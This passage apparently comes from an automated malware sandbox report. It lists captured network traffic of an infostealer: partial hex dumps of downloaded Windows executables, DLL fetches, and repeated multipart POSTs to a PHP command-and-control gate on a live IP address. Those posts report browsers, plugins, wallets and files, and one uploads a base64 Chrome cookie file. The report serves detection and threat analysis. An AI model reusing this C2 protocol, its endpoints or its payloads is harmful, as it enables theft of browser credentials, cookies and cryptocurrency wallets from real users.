00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 Jan 2025 18:46:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 Jan 2025 18:46:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 41 43 30 41 35 45 30 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 72 61 74 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 2d 2d 0d 0a Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="hwid"3A3AC0A5E0C62507286958------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="build"brat------HCFIJKKKKKFCAAAAFBKF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 31 64 61 30 63 36 64 31 64 62 39 61 62 32 32 37 63 30 38 63 33 64 66 36 64 65 38 33 36 36 63 39 65 65 31 39 34 36 38 65 37 34 30 37 61 31 61 32 66 38 34 35 66 64 36 62 32 36 61 32 30 64 35 63 30 39 32 30 66 63 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="token"3e1da0c6d1db9ab227c08c3df6de8366c9ee19468e7407a1a2f845fd6b26a20d5c0920fc------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="message"browsers------GDGIJECGDGCBKECAKFBG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 31 64 61 30 63 36 64 31 64 62 39 61 62 32 32 37 63 30 38 63 33 64 66 36 64 65 38 33 36 36 63 39 65 65 31 39 34 36 38 65 37 34 30 37 61 31 61 32 66 38 34 35 66 64 36 62 32 36 61 32 30 64 35 63 30 39 32 30 66 63 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"3e1da0c6d1db9ab227c08c3df6de8366c9ee19468e7407a1a2f845fd6b26a20d5c0920fc------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="message"plugins------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 31 64 61 30 63 36 64 31 64 62 39 61 62 32 32 37 63 30 38 63 33 64 66 36 64 65 38 33 36 36 63 39 65 65 31 39 34 36 38 65 37 34 30 37 61 31 61 32 66 38 34 35 66 64 36 62 32 36 61 32 30 64 35 63 30 39 32 30 66 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 2d 2d 0d 0a Data Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="token"3e1da0c6d1db9ab227c08c3df6de8366c9ee19468e7407a1a2f845fd6b26a20d5c0920fc------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="message"fplugins------ECBGCBGCAFIIECBFIDHI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFCFHJDBKKFHIEHIDGHost: 185.215.113.206Content-Length: 5955Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAAHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 31 64 61 30 63 36 64 31 64 62 39 61 62 32 32 37 63 30 38 63 33 64 66 36 64 65 38 33 36 36 63 39 65 65 31 39 34 36 38 65 37 34 30 37 61 31 61 32 66 38 34 35 66 64 36 62 32 36 61 32 30 64 35 63 30 39 32 30 66 63 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="token"3e1da0c6d1db9ab227c08c3df6de8366c9ee19468e7407a1a2f845fd6b26a20d5c0920fc------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------EGIJEBGDAFHIJJKEHCAA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGDGHCAAKECFHJKFIJKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 44 47 48 43 41 41 4b 45 43 46 48 4a 4b 46 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 31 64 61 30 63 36 64 31 64 62 39 61 62 32 32 37 63 30 38 63 33 64 66 36 64 65 38 33 36 36 63 39 65 65 31 39 34 36 38 65 37 34 30 37 61 31 61 32 66 38 34 35 66 64 36 62 32 36 61 32 30 64 35 63 30 39 32 30 66 63 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 47 48 43 41 41 4b 45 43 46 48 4a 4b 46 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 47 48 43 41 41 4b 45 43 46 48 4a 4b 46 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 47 48 43 41 41 4b 45 43 46 48 4a 4b 46 49 4a 4b 2d 2d 0d 0a Data Ascii: ------HDGDGHCAAKECFHJKFIJKContent-Disposition: form-data; name="token"3e1da0c6d1db9ab227c08c3df6de8366c9ee19468e7407a1a2f845fd6b26a20d5c0920fc------HDGDGHCAAKECFHJKFIJKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HDGDGHCAAKECFHJKFIJKContent-Disposition: form-data; name="file"------HDGDGHCAAKECFHJKFIJK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 31 64 61 30 63 36 64 31 64 62 39 61 62 32 32 37 63 30 38 63 33 64 66 36 64 65 38 33 36 36 63 39 65 65 31 39 34 36 38 65 37 34 30 37 61 31 61 32 66 38 34 35 66 64 36 62 32 36 61 32 30 64 35 63 30 39 32 30 66 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="token"3e1da0c6d1db9ab227c08c3df6de8366c9ee19468e7407a1a2f845fd6b26a20d5c0920fc------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file"------AFBKKFBAEGDHJJJJKFBK--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 31 64 61 30 63 36 64 31 64 62 39 61 62 32 32 37 63 30 38 63 33 64 66 36 64 65 38 33 36 36 63 39 65 65 31 39 34 36 38 65 37 34 30 37 61 31 61 32 66 38 34 35 66 64 36 62 32 36 61 32 30 64 35 63 30 39 32 30 66 63 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 2d 2d 0d 0a Data Ascii: ------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="token"3e1da0c6d1db9ab227c08c3df6de8366c9ee19468e7407a1a2f845fd6b26a20d5c0920fc------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="message"wallets------HCAAEGIJKEGHIDGCBAEB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJDHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 31 64 61 30 63 36 64 31 64 62 39 61 62 32 32 37 63 30 38 63 33 64 66 36 64 65 38 33 36 36 63 39 65 65 31 39 34 36 38 65 37 34 30 37 61 31 61 32 66 38 34 35 66 64 36 62 32 36 61 32 30 64 35 63 30 39 32 30 66 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 2d 2d 0d 0a Data Ascii: ------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="token"3e1da0c6d1db9ab227c08c3df6de8366c9ee19468e7407a1a2f845fd6b26a20d5c0920fc------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="message"files------JJJJEBGDAFHJEBGDGIJD--
